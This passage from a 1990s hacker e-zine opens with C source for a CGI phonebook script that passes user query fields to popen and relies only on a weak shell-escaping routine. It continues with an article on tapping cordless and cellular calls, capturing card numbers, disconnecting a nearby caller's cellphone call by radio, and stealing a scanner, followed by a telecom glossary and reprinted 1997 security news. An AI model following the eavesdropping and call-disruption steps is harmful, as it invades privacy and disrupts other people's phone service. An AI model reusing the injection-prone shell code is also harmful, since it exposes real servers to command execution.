printf("<A HREF=\"%s?Jform=%d\"><H3>Show additional fields to narrow query</H3></A>%c", getenv("SCRIPT_NAME"), (which | 0x10), LF);
}
else {
printf("<H3>Additional fields to narrow query:</H3><UL>%c",LF);
for(x=0; othersearchfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"text\" NAME=\"%s\" MAXLENGTH=\"%d\">%s%c"
,othersearchfields[x].qfield, othersearchfields[x].qlen,
othersearchfields[x].qname,LF);
printf("</UL>%c", LF);
printf("<A HREF=\"%s?Jform=%d\">Show fewer query fields</A>%c", getenv("SCRIPT_NAME"), (which & 0x01), LF);
}
HTML_BREAK
if (!(which & 0x01)) {
printf("<A HREF=\"%s?Jform=%d\"><H3>Return more than default fields</H3></A>%c", getenv("SCRIPT_NAME"), (which | 0x01), LF);
}
else {
printf("<H3>Fields to return:</H3><UL>%c", LF);
for(x=0; idxfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"checkbox\" NAME=\"return\" VALUE=\"%s\">%s%c", &(idxfields[x].qfield[1]), idxfields[x].qname, LF);
for(x=0; othersearchfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"checkbox\" NAME=\"return\" VALUE=\"%s\">%s%c", &(othersearchfields[x].qfield[1]), othersearchfields[x].qname, LF);
printf("</UL>%c", LF);
printf("<A HREF=\"%s?Jform=%d\">Return default fields</A>%c", getenv("SCRIPT_NAME"), (which & 0x10), LF);
}
HTML_BREAK
printf("<INPUT TYPE=\"submit\">%c", LF);
printf("</FORM>%c", LF);
printf("<HR>%c<ADDRESS>", LF);
printf("Questions, comments to: <a href=\"http://www.ncsa.uiuc.edu/SDG/People/jbrowne/jbrowne.html\">Jim Browne</a>%c", LF);
printf("</ADDRESS>%c", LF);
}
main(int argc, char *argv[]) {
entry entries[64];
register int x,m=0;
char *cl;
char returnstr[1024], typestr[4098], commandstr[8192], serverstr[256];
int atleastonereturn = 0, atleastonequery = 0, which = 0;
FILE *phfp;
printf("Content-type: text/html%c%c",LF,LF);
strcpy(returnstr, "return ");
strcpy(typestr, " ");
cl = getenv("QUERY_STRING");
if((!cl) || (!cl[0])) {
send_doc(0);
exit(1);
}
for(x=0;cl[0] != '\0';x++) {
m=x;
getword(entries[x].val,cl,'&');
plustospace(entries[x].val);
unescape_url(entries[x].val);
getword(entries[x].name,entries[x].val,'=');
}
for(x=0; x <= m; x++) {
/* printf("%s = %s %c", entries[x].name, entries[x].val, LF); */
if (!strcmp(entries[x].name, "return")) {
strcat(returnstr, entries[x].val);
strcat(returnstr, " ");
atleastonereturn = 1;
}
else if ((entries[x].name[0] == 'Q') && strlen(entries[x].val)) {
strcat(typestr, &(entries[x].name[1]));
strcat(typestr, "=");
strcat(typestr, entries[x].val);
strcat(typestr, " ");
atleastonequery = 1;
}
else if (!strcmp(entries[x].name, "Jserver"))
strcpy(serverstr, entries[x].val);
else if (!strcmp(entries[x].name, "Jform"))
if (sscanf(entries[x].val, "%d", &which)) {
send_doc(which);
exit(1);
}
else exit(1);
}
printf("<H1>Query Results</H1>%c", LF);
HTML_BREAK
if (!atleastonequery) printf("<B>You did not enter a query!</B>%c",LF);
else {
strcpy(commandstr, "/usr/local/bin/ph -m ");
if (strlen(serverstr)) {
strcat(commandstr, " -s ");
/* RM 2/22/94 oops */
escape_shell_cmd(serverstr);
strcat(commandstr, serverstr);
strcat(commandstr, " ");
}
escape_shell_cmd(typestr);
strcat(commandstr, typestr);
if (atleastonereturn) {
escape_shell_cmd(returnstr);
strcat(commandstr, returnstr);
}
printf("%s%c", commandstr, LF);
printf("<PRE>%c", LF);
phfp = popen(commandstr,"r");
send_fd(phfp, stdout);
printf("</PRE>%c", LF);
}
}
_____________________________________________________________
---------------------------------------
--=[The history of digital technology]=--
Written by REality
REF. Evolution to Digital (elseberry@usa.net)
---------------------------------------
In the early 1960's the Bell Systems began to introduce and use a new
digital technology in its network. This was necessary because the older
carrier systems were rapidly becoming obsolete, and the demand for newer
and higher speed communications facilities was building both internally and
among the end user communities.
As this digital technology was being introduced, it was being deployed in
the public telephone network as a means of increasing the traffic capacity,
within the Bell system only, on the existing wire pair cable facilities as
interoffice trunks. The older systems which included the N-Carrier system
used a two or four wire connection through an analog multiplexing device to
deliver 12 or 24 analog channels depending on the version of N-Carrier used.
This was still an inefficient use of the line capacity, and the analog
service was both noisy and required expensive line treatment equipment.
Thus, Bell introduced its newer technology.
The analog systems were therefore coming to the end of their usable life.
The telephone companies had to find a way of improving the utilization of
the cable plant on an interoffice basis because they had traditionally
under-utilized the pairs of wires and the continued installation of
inefficient systems was expensive and bulky. The average length of these
wires between their offices was approximately 6.5 miles. As calling
requirements continued to grow the telephone companies needed to increase
the traffic handling on these interoffice routes. Yet, they were in a
quandary. First, they didn't want to continue running on major sized cables
between offices, there simply wasn't enough space. Second, costs were
escalating based on the reinforcement to their outside plant.
What did Bell Systems decide to do about this huge problem that they faced?
Keep reading The HAVOC Technical journal to find out. This story will be
continued in the next edition of The HAVOC Technical Journal.
_____________________________________________________________
-------------------------
--=[Scanning for losers]=--
Written by shamr0ck
-------------------------
Today I'm going to tell you stuff about scanners and fun things you can do
with them. I have found many different active frequencies but the ones that
are the most entertaining are from cellphones (806-956MHz) and cordless
phones (43-50MHz/902-928MHz). I've got a pro-62 scanner and it doesn't have
the cellular frequencies on it because it's illegal to sell scanners that
pick up cellphones in the United States, but not in Canada, if you catch my
drift. I am hoping to modify it some day, but anyway it does pick up cordless
phones, and I've happened upon many different conversations with it. Like
just today I heard some middle aged black guy having phone sex with a fat
chick with a southern accent. Being the loser I am, I listened in for a while
since I wasn't paying for it, and made sure to follow the warning message at
the start of the call and kept both hands on the scanner at all times. I
wasn't abusing myself or anything, I swear. Because of this wonderful
scanner I've picked up calling card and credit card numbers, but God knows I
wasn't planning to use them, because I like paying for stuff. Yeah, that's
it. One of the perks of being close to your unsuspecting scanner victim is
that you can disconnect their cellphone call. First off get your fat ass off
your computer, and run over to radio shack. Acquire a scanner by any means
necessary, but don't be a dumbass and pay more than $200 for it, if you pay
for it at all. You could borrow one or something. Now you're all set. If
you're listening to someone's cellphone call and you're within about 30 feet
of the caller you can hang up their call. If you're asking yourself "How the
fuck can I do that?", shut up and I'll tell you. Find their input frequency..
search 824-850 or whatever. Add 45MHz to see if you hear them on the output
along with the phone line audio. Then if you add 10.7 to that frequency
(if you have a radio shack scanner) and punch it in it will generate a low
power carrier on their phone. Because the phone thinks it lost the cell
frequency it will hang up in about 3 seconds. I didn't come up with this I
got it off a web page but who cares it's still funny as hell. Another thing
to get if you want to know more about scanners is this book called Police
Call. Rip it off at your local radio shack. If you want to know more just
e-mail me at speidel@lightspeed.net or come see me on undernet #phreak. If
I'm not there, goto #flood and bug those shitheads.
_____________________________________________________________
----------------------------------
--=[REality's Digital Dictionary]=--
Written by REality
REF. Racal-DataCOM (elseberry@usa.net)
----------------------------------
(ABAM)
A designation for 22 gauge, 110 ohm, plastic insulated, twisted pair Western
Electric cable normally used in central offices.
(A&B Leads)
This shit refers to the additional leads used typically with a channel bank
tow wire E&M interface to certain types of 'ereet' PBXs (also used to return
talk battery to the PBX itself).
(A&B Signaling)
Procedure used in T1 transmission facilities in which one bit, robbed from
each of the 24 subchannels in every sisth frame, is used for carrying dial
and control information. A type of T1 inband signaling, similar to ICMP for
you warez kiddiez.
(Access Unit)
Sometimes this shit is abbreviated as (AU). It is a device that provides ISDN
access to a packet switched service or network. Otherwords, a k-rad iNET
connection.
(Acoustic Coupler)
WooHoo! This is a device that allows a telephone handset to be used for
access tp the switched telephone network for data transmission (gennerally
limited to low-speed 1200 bps).
(ACU)(Automatic Calling Unit)
A machine that dials a call automatically when under another computers
control.
(A/D)
This is one of the easiest terms to remeber dwds. All it means is "Analog to
Digital conversion."
(ADM3)
A Bellcore designation for the DS-3 device that has familar functionality to
a T1 mux. Otherwords, a peice of shit..
(AIS)
In T1, an all ones condition used to alert a reciever thats its incoming
signal or frame has been lost. The loss of signal or frame is detected at the
recieving end, and the failed signal is replaced by all ones condition which
the reciever interprets as an AIS! the normal response to this AIS is for the
recieving end to generate a Yellow Alarm signal as part of its transmission
towards the faulty end. This is sometimes called a Blue signal, and I have no
idea why.
(Algorithm)
A defined set of operational steps to be taken to effect a desired
calculation. An example of its use os the Data Encryption Standard (DES)
algorithm of the National Bereau of Standards which is used in the encryption
of transmitted data to protect its security.
(AM)(Amplitude Modulation)
A transmission technique where the amplitude of the carrier signal is varied
by the value of the signal to be transmitted.
(Ameritech)
One of the seven Regional Bell Holding Companies, resulting from divesiture,
covering the midwestern U.S., based in Chicago, and comprised of Illinois
Bell, Indiana Bell, Michigan Bell, Ohio Bell, and Wisconsin Tel.
(Analog)
In data communcations, the description of the continous wave or signal for
which conventional telephone lines are designed. For transmission on these
lines, the digital or pulse output of a computer or terminal must be
converted to an analog signal.
(ANI)(Automatic Number Identifacation)
Ability of the network to notify the called party of the calling party's
number and/or directory listing.
(ATM)(Asynchronous Transfer Mode)
A high-speed, connection oriented cell relay transmission scheme that
provides bandwidth to channels as needed. ATM used a 53-octet cell, where the
first five octets convey header information and the remaining 48 octets are
payload.
(Backbone Network)
A transmission facility or arrangement of such facilities designed to
interconnect lower speed distribution channels or clusters of dispersed users
or devices.
(Bandwidth)
A range of frequencies between two defined limits expressed in cycles per
second or Hertz. Also, the information carrying capacity of a circuit.
(Baud)
A unit of signalling speed equivalent to the number of discrete conditions or
signal elements per second. Multiple bits may be used to chracterize
individual paramters within one baud(ie, 9600 bits per second as a rate of
2400 baud = 4 bits per each baud).
(Bellcore)(Bell Communications Research)
The orginization established at AT&T divesiture, representing and funded by
the BOCs and RBOCs, for the purpose of establishing eleet telephone network
standards and interfaces.
(Bit Stuffing)
A process in bit-oriented protocols where a zero is inserted into a string of
ones by the sender to prevent the reciever from interpreting valid user data
as control characters.
Check out THTJ11 for the second installment of REality's Digital Dictionary
_____________________________________________________________
-------------------------------
--=[K-Kool hackers chat here!]=--
Discovered by KungFuFox
-------------------------------
While I was busy trashing on the internet, I came across a superhacker
forum that I think all of you should check out, because it's so elite. Well,
at least read the posts, it's funny as hell. Topics include:
"Can't hackers do something good"
"DO any of you really know what hacking is???"
"HACKING KICKS"
"Hack Chat for hackers only!"
"Real Hacker Conversations. Do not come in unless you are a real hacker."
"my moms a hacker"
Personally, I don't know of any hacker moms, and I was certainly interested
in finding out what REAL HACKERS talk about, so I gave it a look. Here's a
few clips that I found to be rather entertaining, from the "HACKING KICKS"
topic.
-
by scott@netbridge.net,
Mon Oct 28 03:06:37 1996
Achieving access to unauthorized places is also known as "burglary". If you
were to break into an unauthorized place, such as my house, for example, you
may find yourself bleeding from bullet wounds. Or, if the place you broke in
to was a computer address, you may find yourself suffering from some other
ailment-imprisonment. All real hackers would tell you, prison life sucks!
This is where all real hackers end up. All others are wannabe's.
by scott@netbridge.net,
Mon Oct 28 03:12:31 1996
PS-If you are not brave enough to leave your name or address, then you must
be a coward.
by Hackers Heaven,
Thu Oct 31 22:10:59 1996
What do you want my address for, do you want to come over and watch me Hack?
by Hackers Heaven,
Thu Oct 31 22:12:30 1996
If I were to break into your house, I would see to it that you were also
bleeding from bullet wounds
by scott@netbridge.net,
Fri Nov 1 05:37:02 1996
I don't like to go to dork's houses, or watch them play with their toys,
pretending to be cool. Come on over-we'll see who's bleeding , and cut down
on 50% of these messages. Thanks for your input. Dork.
by scott@netbridge.net,
Fri Nov 1 05:43:28 1996
PS-If you were a real hacker, you'd have a lot better things to do than leave
messages here. I don't think you're fooling anyone. Give it up, you're not a
real hacker, so quit pretending.
-
Now isn't that just the most elite hacker talk you've ever seen? There's more
where those came from!
http://eagle.online.discovery.com
/cgi-bin/forums_view/dir861922735/Technology/Technology%20Central/Hackers/
Discovery probably owns the rights to all that crap once it was posted, but
that doesn't really matter now, does it?
_____________________________________________________________
[news]
--------------
--=[The News]=--
Compiled & edited by KungFuFox
[ More news from antifire and Scud-O ]
--------------
1 : How To Hack Social Security
2 : E-Mail Security Warning
3 : Internet security code said vulnerable to hackers
4 : Hacker Contest Fails to Crack Mac Web Server
5 : Columnist Who Warned of Net's Collapse Pays Up
6 : DNS: The Problematic Phone Book of Cyberspace
7 : Viruses Tripled in Past Year
8 : Trojan Vigilante Targets AOL Cheats
9 : Regional Phone Companies to Offer New Access Technologies for ISPs
10: Hacker Provokes Klan Site Shutdown
11: RedButton Lets Anyone Be Everyone
12: AOL4FREE Culprit Tells His Tale
13: AGIS Keeps Mum Over Attack, FBI Inquiry
14: HLO brings chaos to CERT conference
15: 3rd Major NT Bug Found..................... antifire
16: Maryland Starts 10 Digit Dialing........... Scud-O
17: Bell Atlantic/ Nynex merger moves closer... Scud-O
18: Inferno OS Beta Test is Released........... Scud-O
"It's the latest in communictions technology."
-Ross, from the motion picture 'Congo'
_____________________________________________________________
How To Hack Social Security
WASHINGTON, D.C.: Want to know your co-worker's salary? How about checking
out how much your new boyfriend is really worth? It's all available on the
Social Security Administration's website with just a few bits of personal
information: Social Security number, mother's maiden name and state of
birth. The site, launched just a month ago, contains complete financial data
on tens of millions of Americans dating back to 1951. The reason behind the
page is primarily financial: The agency thinks that making the information
available on the Web will save millions of dollars in paperwork. Last year,
the SSA mailed some four million financial reports to taxpayers at a cost of
$5.23 each. Delivering the same report over the Internet costs a fraction of
a penny. As usual, the bureaucrats are not very concerned that the site
makes collecting private Social Security information relatively easy. "We
have confidence that in the huge majority of cases, the people requesting
these things are the right people," John Sabo, SSA's director of the
Electronic Services Staff, told USA Today, mysteriously.
_____________________________________________________________
E-Mail Security Warning
(04/08/97; 11:01 a.m. EST)
By Jeff Sweat, InformationWeek
Some versions of the IMAP and POP messaging and mail protocols contain
security holes that can let hackers manipulate Internet applications built
on the protocols and gain unauthorized access to networks, according to the
Computer Emergency Response Team.
The CERT Coordination Center, affiliated with Carnegie Mellon University in
Pittsburgh, has issued a security advisory about the vulnerabilities in
certain versions of the IMAP and POP protocols. Both protocols require root
privileges so the server can access mail protocols.
Although those privileges are typically discarded after log-on, the security
flaws let hackers gain root access to a system through text entered in the
log-on transaction. The hacker, who doesn't require a user account, can then
execute commands on the system through the root privileges.
The vulnerabilities affect IMAP d, IPOP 2d and IPOP 3d. To avoid problems,
CERT recommended that IS organizations install a patch from their application
vendors or upgrade to IMAP 4.0, revision 1. Until then, businesses should
disable IMAP and POP services, CERT said.
©CMP Media, 1996.
_____________________________________________________________
Internet security code said vulnerable to hackers
Wednesday, April 09, 1997 6:49:00 PM EDT
By David Morgan
ATLANTA (Reuter) - The new security protocol for safeguarding credit-card
transactions on the Internet may have to change because the underlying
cryptography is too easy to hack through and too difficult to upgrade, an
expert said Wednesday.
Steve Mott, senior vice president of electronic commerce and new ventures for
MasterCard International, said it could take hackers as little as a year to
break the industry's standard encryption code, which is supposed to render
credit-card numbers unreadable to outsiders on the Internet's World Wide Web.
For that reason, the consortium of technology companies and creditors that
has spent two years years developing the Secure Electronic Transaction (SET)
protocol may switch to a faster encryption system called Elliptic Curve,
which is produced by Certicom Corp.
The first complete version of SET, known as SET 1.0, will be available to
software makers June 1 with core cryptography provided by RSA Data Security,
a unit of Security Dynamics Technologies Inc.
"RSA is a very good starting point. But we suspect that in a year or two, the
Kevin Mitnicks of the world will start to figure out ways to hack it," Mott
said. Mitnick is one of the most notorious computer hackers.
"The only way you scale an RSA is to add a lot more bits. You add a lot more
bits and it becomes more complex software in terms of the interaction of the
transaction messages. That's part of what's taken SET so long to start with."
MasterCard has been helping put together merchants with its own member banks
for SET pilot projects in Denmark, Japan, Taiwan, South Africa and the United
States.
Mott told a news conference at the Internet Commerce Expo that the Elliptic
Curve encryption system would make a better encryption core. In fact, he said
it would have been chosen in the first place if developers had been known
about it.
"It will fit on a chip card. I think its 160 bits equals security to 1,024
bits of RSA," the credit industry executive said. "We anticipate putting it
into some SET 1.0 pilots in the very near future this year in the U.S."
Far from being disturbed by the possibility of hackers getting through the
current SET cryptography, Mott said SET's developers would "give them an
award and a ribbon and then embody whatever they did as part of the
improvements" in the next version of security standards.
"The current version for SET is as safe as anybody can make it," he said.
©Reuters Ltd.
_____________________________________________________________
Hacker Contest Fails to Crack Mac Web Server
April 12, 1997
By JOE HUTSKO
It was an invitation few hackers could resist, a cracker come-on backed by a
cash prize: Be the first to break into our Web server and alter the home
page, and we'll give you $15,000. But when the dust had settled, the humble
Apple Macintosh Web server was still intact -- a boast that industry giants
and more powerful computers could not match.
Two months have passed since Infinit Information, a systems consulting firm
based in Sweden, posed its digital dare, dubbed "Crack a Mac," offering
100,000 Swedish kroner, or about $15,000, to anyone who could break into its
Macintosh-powered Web server.
In the first week alone, more than 38,000 visitors dropped by to take either
a curious peek or an outright crack at the challenge. But by the time the
contest closed on Thursday, the company's chief executive, Joakim Jardenberg,
said that the cash would go uncollected because no one had managed to crack
into the company's server.
In all, Jardenberg said, people at more than 100,000 computers (as identified
by uniqure IP addresses) visited the challenge site, sending more than 8
gigabytes of data in their attempts to break in. He said that about 75
percent of the visitors were from the United States, 20 percent were from
Sweden, and the remaining 5 percent were from other nations, including El
Salvador and Mauritius.
The rules of the game were straightforward. Crackers could not physically
attack the computer or company premises; they were required to reach the
Infinit Information Web server through the Internet. "Breaking into our house
would not only mean you would be disqualified from the challenge, you would
also have to deal with our dog and the police," the company declared.
Proof of the crack was to be substantiated by altering the company's home
page in whatever way the cracker deemed fit -- graphically, textually,
noisily -- so long as it was "human-readable." To collect the prize, the
winner would be required to describe in detail how the crack was
accomplished, as well as permit Infinit Information to publish (anonymously,
if the winner preferred) its findings.
Jardenberg also asked that anyone who managed to break in not violate the
company's other servers, which it uses to run its business.
The contestants included at least a few heavy hitters, said Jardenberg, who
was inspired by a similar cracker contest, The Security Challenge, that ran
in 1995. Jardenberg listed International Business Machines, Microsoft,
Silicon Graphics Inc., AT&T, Netscape Communications, NASA, and the United
States Army among the higher-profile organizations that tried to break into
his company's server.
Citing high-profile cracker jobs like the attack on the Central
Intelligence Agency's home page last year, Jardenberg stated that the
contest's main objective was to prove the trustworthiness of the Apple
Macintosh as a secure Web server in comparison with Unix-based servers
produced by companies like Sun Microsystems and Silicon Graphics.
There is no such thing as a definitive test of the security of one system
versus another, but the outcome of Jardenberg's challenge clearly gives a lot
of bragging rights to Mac proponents -- especially at a time when the Net is
deluged with horror stories about security weaknesses in both Web servers,
the machines that host sites, and Web browsers, the software that brings the
Web into the user's machine.
Infinit Information's challenge machine was a Macintosh 8500/150 running
StarNine Technologies' WebStar server software.
Having survived its first onslaught of attacks, Jardenberg said the company
is giving its Mac server "a well-deserved break." But it won't be a vacation
long. Jardenberg is promising foiled contestants another crack at the Infinit
Information site in a few weeks.
©The New York Times
_____________________________________________________________
Columnist Who Warned of Net's Collapse Pays Up
Saturday, April 12, 1997 7:41:00 AM EDT
SANTA CLARA, Calif. (Reuter) - A computer pioneer and industry columnist
who predicted -- wrongly -- that the Internet would collapse last year
kept his promise and literally ate his words at a conference room packed
with Net experts and partisans.
"Eat, baby, eat!" the crowd chanted, whooping and clapping, when columnist
Bob Metcalfe tried to keep his pledge by eating a piece of giant cake iced to
look like his column in the trade publication InfoWorld. It didn't fly.
Metcalfe -- who invented Ethernet computer networking and founded networking
company 3Com Corp. -- had promised to eat the words from his December 1995
column predicting a "catastrophic collapse" of the Internet in 1996 if it did
not come to pass.
Metcalfe, who made the vow at a 1995 conference in Boston, argued at the
Sixth International World Wide Web Conference in Santa Clara, Calif.,
Thursday that there had been major outages last year. But he acknowledged the
big collapse had not happened.
When the audience at his closing address Thursday night objected to his cake
gambit, the 51-year-old columnist said, with mock surprise, "I kind of
suspected it would turn ugly."
He then ripped a copy of the column from a back issue of InfoWorld, tore it
into pieces and dropped it into a clear liquid in a blender hidden on stage.
Metcalfe poured the resulting mix into bowl, sampled the cloudy, pulpy
substance with a spoon then slurped it down to the crowd's cheers.
©Reuters Ltd.
_____________________________________________________________
DNS: The Problematic Phone Book of Cyberspace
by Simson Garfinkel
6:00pm 9.Apr.97.PDT -- Today the Internet's domain name system (DNS)
remains one of the networks' weakest links. DNS is the Internet protocol
that translates host names, like www.hotwired.com, into IP addresses, like
204.62.129.1. It's the phone book of cyberspace, but it's riddled with
problems.
Others have chronicled the political problems that the domain name system's
top-down structure has created. Most of these problems involve Network
Solutions Inc. (aka InterNIC), which manages the .com, .mil, .edu, .gov,
.net, and .org top-level domains. NSI has been criticized for its handling of
trademark disputes involving domain names and allegedly monopolistic
practices.
What's worse, the domain name system is fundamentally insecure. By
transmitting rogue packets to a computer, a hacker or information terrorist
can confuse that machine, cajoling it into contacting one machine on the
Internet when it means to reach another. Under certain conditions, a hacker
can use DNS spoofing to break into a computer. DNS spoofing can be used to
redirect or steal electronic mail, intercept pages sent over the World Wide
Web, or impersonate other Web surfers. It's easy, untraceable, and becoming
more common all the time.
Over the past few years, a working group of the Internet Engineering Task
Force has developed an improved DNS - called DNSSEC - that solves the
protocol's underlying security problems. The Department of Defense's Internet
Infrastructure Protection program funded the technical work, which was in
turn carried out by Trusted Information Systems. That organization has made a
working implementation of the protocol freely available for download.
DNSSEC uses public key encryption and digital signatures to certify every
address that's resolved by the DNS system. Each domain is assigned a public
key. When your computer looks up a host in a particular domain, it checks the
signature on the host's response. This eliminates spoofing; the bad guys can
still send you a bogus response, but they can't sign it with the matching
private key.
Besides strengthening the domain name system, DNSSEC can function as a
database for distributing public keys. "Currently there is no protocol
defined for publishing and automatically obtaining a public key for a user, a
Web site, etc. DNSSEC can be used for this," says EFF founder John Gilmore,
who is helping with the effort. "The keys themselves can be VeriSign keys,
DNSSEC keys, Elliptic Curve encryption keys, or whatever."
Getting the Internet to adopt DNSSEC is a three-step process, says Donald
Eastlake, secretary of the DNSSEC working group. First, network
administrators and webmasters need to create public keys and secret keys for
their Internet domains, and store those keys in their DNS servers. Second,
they must modify their nameservers so they provide signed responses whenever
a DNS query is made. Finally, the major server software companies must modify
the resolves - the programs that run on the desktop and translate domain
names into IP addresses - to verify those signatures. But no company I am
aware of has announced plans to incorporate DNSSEC into its DNS resolves.
Signature verification also requires use of the RSA patent, and RSA Data
Security hasn't yet given its go-ahead.
But what's most disturbing is that few people in the computer industry - even
those who work with computer security - have even heard about DNSSEC. It will
have to gain a higher profile before it will fly.
©Packet
_____________________________________________________________
Viruses Tripled in Past Year
2:54pm 15.Apr.97.PDT -- The National Computer Security Association (NCSA)
says the rate of computer virus infections has tripled over the past year,
with the viruses passing for the most part through Microsoft Word and
spreadsheet attachments sent via email.
The study, released Monday, points to the evolution of viral hacking that
travels through tiny "macro viruses" - written in bits of code - rather than
disks or software which contain larger executable, and therefore dangerous,
code.
"Most really successful viruses are very simple, very quiet and they
hitch-hike on the most commonly spread types of files" like Word documents
and spreadsheets, said Candace Turtle, spokeswoman for Trend Micro Inc., a
maker of antivirus software that sponsored the survey with Microsoft,
Quarterdeck, and Symantec, among others.
The results of the annual survey of 300 organizations - each with more than
500 PCs - show that the infection rate is about 33 per 1,000 computers per
month, up from about 10 per 1,000 last year. The report shows that nearly as
many virus incidents occurred in January 1997 as in the last six months of
1996.
The most common virus over the past year has been the Word.Concept virus,
which travels on Microsoft Word documents and infected 49 percent of all
sites in the survey. The Wazzu virus, another macro virus that embeds itself
in Word documents, was responsible for about one-fifth of all outbreaks,
according to the study.
"'Macro viruses' are a huge industry problem," says Christine Winkel, product
manager at Microsoft, "and we are working closely with the antivirus
community to make [macros] safer." To block viral outbreaks, Word 97, which
shipped in January, alerts users when a document containing a macro is opened
and gives the them the choice of enabling the macro or not. "We encourage
people to say 'no' if they're not sure of the source," says Winkel.
©FEED
_____________________________________________________________
Trojan Vigilante Targets AOL Cheats
(4/17/97; 1:00 p.m. EST)
By Douglas Hayward , TechWire
WASHINGTON -- Cheats who attempt to steal Internet access from America
Online are having their hard disks wiped out by a digital vigilante.
A highly dangerous Trojan horse program is circulating on the Internet that
deletes all files on a user's hard disk, researchers at the U.S. Department
of Energy's Computer Incident Advisory Capability unit said Wednesday in an
urgent bulletin. The program masquerades as a piece of illegal software, the
AOL4free.com program, that lets users create fraudulent AOL user accounts.
Established in 1989, the Computer Incident Advisory Capability is a U.S.
government agency that provides computer security services to employees and
contractors of the Department of Energy.
A Trojan horse program differs from a virus in that it must be run by users
to do its damage. Trojan horses cannot automatically duplicate themselves or
spread without human intervention, as viruses do.
"If you are E-mailed this file, or if you have down loaded it from an online
service, do not attempt to run it," the agency said. "If the program was
received as an attachment to an E-mail message, do not double-click [to open]
it. Opening an attached program runs that program, which in this case deletes
all the files on your hard drive," the agency said.
The AOL4free Trojan horse, which is just 933 bytes long, tells users that
"Your computer has just been f***ed by *VP* f*** you AOL-lamer" while
deleting all files on the user's hard disk using the DOS DelTree command. But
pressing the Control and C keys before the Trojan horse has finished deleting
the files will let users recover some files -- as long as they have programs
that recover deleted files, the agency said.
The agency also told users not to be lulled into a false sense of security by
a message circulated earlier this year that said it was not true the AOL4free
program contained a virus. "That warning was either a hoax or a badly
misunderstood description of this Trojan horse," it said.
"A lot of people will think this kind of Trojan horse serves the user right
because it punishes people who are trying to do something illegal," said Neil
Barrett, a consultant on computer security with Groupe Bull and the author of
"Digital Crime: Policing The Cybernation," a book published earlier this
year. "Their attitude will be that this is actually a rather jolly piece of
software. But the fact is digital vigilantes can do as much damage --
including damage to innocent people -- as real-life vigilantes can do."
Such serve-you-right attacks are becoming particularly popular among digital
vigilantes targeting pedophiles on the Net, Barrett added. "We have come
across cases where people have set up Websites that appear to be pedophile
sites, with the intention of attracting pedophiles and then capturing their
IP addresses. The people who set the sites up then attack people who have
visited the site by planting viruses on them or by denial-of-service
attacks," he said.
"Whatever you think about pedophiles or people who defraud organizations like
AOL, the fact is that causing damage to computers is a criminal offense in
most countries," Barrett said. "This kind of thing [Trojan horses] can also
affect innocent users."
Because the rogue AOL4free program is a Trojan horse, experts say, it will
spread slowly and its origins will be relatively easy to trace, making it
unlikely to become a major menace. And though the agency said the program is
circulating on the Net, antivirus researchers say it has made no real impact
as yet.
"We have not had any reports from users being hit by these program, so we
don't want people to start panicking about it" said Graham Cluley, a senior
virus expert at U.K.-based security specialist Dr Solomon's Software. "It is
probably going to be a fairly small-scale thing," he said. "There are far
more important things to worry about, like the huge number of macro viruses
around."
©CMP Media, 1996.
_____________________________________________________________
Regional Phone Companies to Offer New Access Technologies for ISPs
April 22, 1997
By SANDEEP JUNNARKAR
While the Federal Communications Commission deliberates on whether to end the
pricing exemption that Internet service providers receive on telephone
service, the regional phone companies plan to release two rounds of new
access technologies in the hopes of luring ISPs off the exempted lines and
onto revenue-generating high-speed lines.
The federal rule, called the Enhanced Service Provider exemption, allows
ISPs, including InternetMCI Dial Access, America Online and the Microsoft
Network, to pay only local business connection rates. The regional phone
companies, commonly known as the Baby Bells, say that this rule denies them
revenues from long-distance communications at the same time that it's
clogging their lines. The FCC began providing this exemption in 1983 to help
foster the growth of the Internet. Phone companies say that the federal
exemption has served its purpose and is now counterproductive.
Several Baby Bells, including Bell Atlantic, NYNEX, and Pacific Bell, plan to
implement new temporary services that they say will alleviate congestion on
the voice networks until they release a family of innovative access
technologies in 1998.
Beginning this summer, NYNEX will market its Internet Access Provider
Service, Bell Atlantic will focus on Internet Protocol Routing Service, and
Pacific Bell will tout its Data Access Gateway. Apart from small technical
variations, these systems are very similar. They involve taking the data
traffic off the voice network near the ISP end of the call, directing it
basically across the floor to a router that connects to a higher-speed frame
relay network.
"This is an approach a lot of the regional Bells seem to be taking to relieve
a lot of the data traffic," said Peter Castleton, managing director for
NYNEX's Data Access Products division. He added that the company's new
service "helps to minimize some of the congestion and provides better and
dedicated access to get to ISPs."
But ISPs are apprehensive about the reliability of the networks offered by
the Bells.
"Our concern about Bell Atlantic's IPRS service, aside from the fact that we
don't know how much it would cost, is that it essentially takes data off our
network and runs it through a local exchange carrier packet switch network,"
said Jill Lesser, deputy director of Law and Public Policy at America
Online, the largest Internet access provider in the United States with more
than 8 million subscribers. "Right now we have ultimate quality control of
our packet network and we like that."
According to one person within the ISP industry, the other reasons the ISPs
will not bite is that the proposed services offer no great leap forward over
the existing systems. That person, who spoke on the condition that he not be
identified, said he saw two problems with the phone companies' technologies.
The first is that the data traffic will still have to go through one voice
switch, thereby not considerably lessening congestion, he said. Second, this
service will be available only in one or two hubs in every calling area
rather than in every central office.
"It's only when they deploy this technology in every single central office
that they can take data completely off the voice network," said the industry
source. "They talk about their technology offering less congestion and better
service but at this point it doesn't measure up. Maybe in a couple of years
that would be the case but by that point, hopefully, we are talking about
xDSL technologies."
And certainly everyone appears to be eagerly anticipating xDSL services, the
next round of access technologies. (The "DSL" stands for Digital Subscriber
Loop, while the "x" is a variable that represents the varying speeds and
methods of transmission offered by different companies.)
"The new DSL technologies are expected to drive a wide variety of
applications in education, health care and telecommuting," said Vinton G.
Cerf, who is widely considered one of the fathers of the Internet and who is
now the executive vice president of Internet architecture at MCI. "This
increased capacity allows consumers in homes and businesses to have access to
high-speed services normally requiring expensive fiber optic line
connections."
Applications of the xDSL technologies will include interactive services like
home shopping and banking, multi-party video games, and multimedia education
and entertainment.
In 1998, the Baby Bells, as well as companies like Cisco Systems, plan to
release the xDSL family of access technologies, which use digital signals
across the traditional copper wires -- the lines that connect nearly every
home and business in the United States.
That copper lines can provide high-speed Internet access comes as a surprise
to most users because of the commonly held belief that the narrow bandwidth
of copper can
optimally only support voice traffic while causing data
bottleneck on the Internet.
"The truth is that we have used only 1 percent of the capability of copper;
the other 99 percent of the band has just been sitting idle," said Jeff
Waldhuter, executive director of research and development at NYNEX's Science
and Technology division. "The existing copper pipe infrastructure has the
capability to provide the super highway today."
NYNEX plans to take advantage of this unused portion of the pipes by offering
something called Asymmetric DSL technology by January 1998.
